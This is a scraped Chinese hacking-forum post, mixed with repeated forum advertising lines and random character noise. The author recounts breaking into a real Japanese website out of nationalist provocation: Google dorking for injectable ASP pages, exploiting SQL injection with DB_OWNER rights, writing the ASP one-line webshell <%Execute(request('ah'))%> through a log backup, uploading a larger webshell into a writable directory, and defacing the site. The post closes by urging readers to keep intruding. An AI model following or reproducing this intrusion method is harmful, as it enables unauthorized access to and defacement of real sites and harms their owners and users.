! X' ^7 \# M9 j0 m. l5 L( _欢迎参观访问,注册指导,发帖回帖,上传下载,交换链接,宣传推广

lrkj.5d6d.com7 p+ L; n  O4 Z& y5 R
电脑技术交流,软件上传下载,打字贴图灌水,眼部疾病咨询,时尚轿车驾驶,音乐歌曲欣赏! l$ e; N% N3 r5 X+ G5 `! c" a( ~- V
一、旅途开始lrkj.5d6d.com3 g# p0 ], U& `$ G+ M
欢迎参观访问,注册指导,发帖回帖,上传下载,交换链接,宣传推广- c: r( [4 |, R3 W3 G: w
       群里有位兄弟发话说，你们这些家伙天天研究那些什么漏洞，想着怎么去黑掉别人，不觉得没意思么，有本事黑几个日本站去！虽然有点过激但也不无道理。我虽然是菜菜，不过也要去看看有没有本事黑几个日本站去。
( f5 |% e% [: ~% E欢迎参观访问,注册指导,发帖回帖,上传下载,交换链接,宣传推广
* J$ N; {% \$ X: U7 G电脑技术交流,软件上传下载,打字贴图灌水,眼部疾病咨询,时尚轿车驾驶,音乐歌曲欣赏二、撒网捉鱼
7 R+ n4 w3 R0 R. Q; m0 Y2 r+ \$ F9 k5 m! W& W* Q1 I
       操起啊D，打开google，输入关键字"asp?id="，每页显示设100页，语言为日文，一顿狂注之后出来N多注入点。随便找了一个，检测一下，发现可以注入。按照常规的方法先猜猜表猜猜列什么的，不过用猜出的用户名和密码登录后发现后台无法利用。而且日文我也看不懂，后台利用的方式应该行不通了。好在是SQL注入，权限又是DB_OWNER，只要能列出WEB目录，还是有希望搞的。于是试着列了下目录，发现可以正常列出来。下一步就是找WEB目录了，打开网站看看，哪些文件在上面能访问到，如。然后用啊D列目录，通过上面的文件的一致性来确定哪个目录才是WEB目录。初步确定F盘为网站目录所在盘，再进一步列目录后最终确定WEB根目录为：F:\JR???????????satsueki.jp?\，虽然看起来怪怪的，但这个的确是WEB根目录。3 D0 `% {0 ]* N3 j4 |8 j  c1 B8 B

" x" m( X1 d& ~9 j4 L# Slrkj.5d6d.com三、瓮中捉鳖
, P4 D  K/ O) Y电脑技术交流,软件上传下载,打字贴图灌水,眼部疾病咨询,时尚轿车驾驶,音乐歌曲欣赏
, z7 k! _2 N1 blrkj.5d6d.com       好了，万事俱备，只欠东风了。这所谓的东风就是利用DB_OWNER的注入权限通过LOG备份的方式写入一句话小马。手工也可以，用工具也可以，我就用工具了。这里推荐用GetWebshellah56bug大众版。需要的信息有：注入点、注入类型、当前数据库、WEB路径。这些信息在用啊D检测的时候都已经有了，全部填好之后。木马代码默认是一句话<%%25Execute(request("ah"))%%25>，%25就代表是空格。然后从第一步到第六步，不过点击的时候不要太快，一般控制在返回注入点页面的时候再点下一步就可以了。然后我们再访问一句话所在的页面，WEB目录下的x.asp就是一句话藏身之处了。我们访问它。页面底部有出错信息，一般看到这样的一句话就已经成功写进去的了。然后再用ASP+PHP两用Shell连接我们的一句话木马，提交环境变量。虽然返回的页面有点乱，但是已经连接成功的了，我们可以看到返回了服务器上的一些信息。
2 P7 [. s7 ~" f& E/ ?, t' flrkj.5d6d.com+ g! e2 O% T2 P. q9 V" S. f
四、山穷水复欢迎参观访问,注册指导,发帖回帖,上传下载,交换链接,宣传推广/ U( ]; e8 N9 B" J2 [

3 N  ~) l. u' H【绿软空间论坛】       本来以为这次入侵到这里就应该快结束的了。可能大家都会先想用一句话上传小马，再用小马上传大马就可以了。可是并没有这么简单，用一句话上传小马的时候却返回出错了，没有成功写入。后来发现目录根本不可写。于是就换了几个目录，发现大部分目录都没有写权限，无法写入ASP马。那时候真想放弃了，不过想到群里那位兄弟说的话，不敢放弃啊。我就不信它上面没有一个可写的目录！经过半小时左右的查找终于发现了：F:&#92;JR???????????satsueki.jp?&#92;shop&#92;img目录下可写！接下来当然是上传大马了。不过为了使返回的页面清楚一点，我在这个目录下重新写进了一句话，然后通过一句话上传大马，提示上传文件成功了。我们现在去访问可爱的大马，结果出现了意外！因为并没有看到登录入口，只看到了几行可恶的出错提！郁闷啊，当时真还以为马太大了，传的时候造成代码损坏了而导致出错呢。可是传了几次，还是一样的结果。又以为是语言的问题，就找了英文版的海阳传上去还是一样。问朋友要了十几个马传上去访问还是出错！连海阳的C/S端提交都出错，一句话专用提交的也试过了，还是不行！“郁闷”这两字的意思那一刻我终于彻底明白了！
# W+ X# e& A) \/ x; ?1 ~【绿软空间论坛】【绿软空间论坛】+ U0 u; i7 G- t# q+ V5 l& d
    五、柳暗花明
/ o% n, I. y- X3 D【绿软空间论坛】
+ M& J9 C) g1 [8 D  B  [. N3 n3 B电脑技术交流,软件上传下载,打字贴图灌水,眼部疾病咨询,时尚轿车驾驶,音乐歌曲欣赏       万般无奈之下，唯有向他人求助了。于是上邪恶八进制发了帖求救，一会儿就有位朋友来帮忙了。他告诉我在ASP马的第一行加上<%@ LANGUAGE=VB codepage ="936" %>这么一行代码。我照着做了，在ASP马的最前面加上那一句代码，再传上去。然后访问，这一回看到了可爱的登录入口了（在此感谢邪八的hc3w朋友)。至此webshell已经拿到了，。但进去之后发现很多文件的确都是只读权限，连首页都改不了，就在可写目录传了个黑页。这个服务器上还有几十个日本网站，不过都是只读权限的，虽然有可写目录，但也不一一传黑页了。
% W5 Q6 d" M& Q" H) ^绿色,空间,论坛,软件,破解,上传,下载,浏览,发帖,回帖
$ H5 B. X4 m1 b( r) S8 g: u     六、反思
6 E1 H# e4 z( J: s9 z
7 u/ w% ~- b0 v$ u9 ~% |; b绿色,空间,论坛,软件,破解,上传,下载,浏览,发帖,回帖    入侵结束了，但是那个加一行代码的问题，我当时还没有搞明白。搞定网站之后我去查了些资料。那行代码中936是一个叫代码页（所谓代码页(code page)就是针对一种语言文字的字符编码。例如GBK的code page是CP936，BIG5的code page是CP950，GB2312的code page是CP20936）的一个代号，表示简体中文。950就是繁体中文，932就是日文。这个只要记住936是我们用的就可以，以后如果遇到网页文件出现乱码的情况可以试着加那一行代码，就能正常解释成简体中文的了。

不容易，真是不容易，不过必须得入侵，锻炼我们的技术。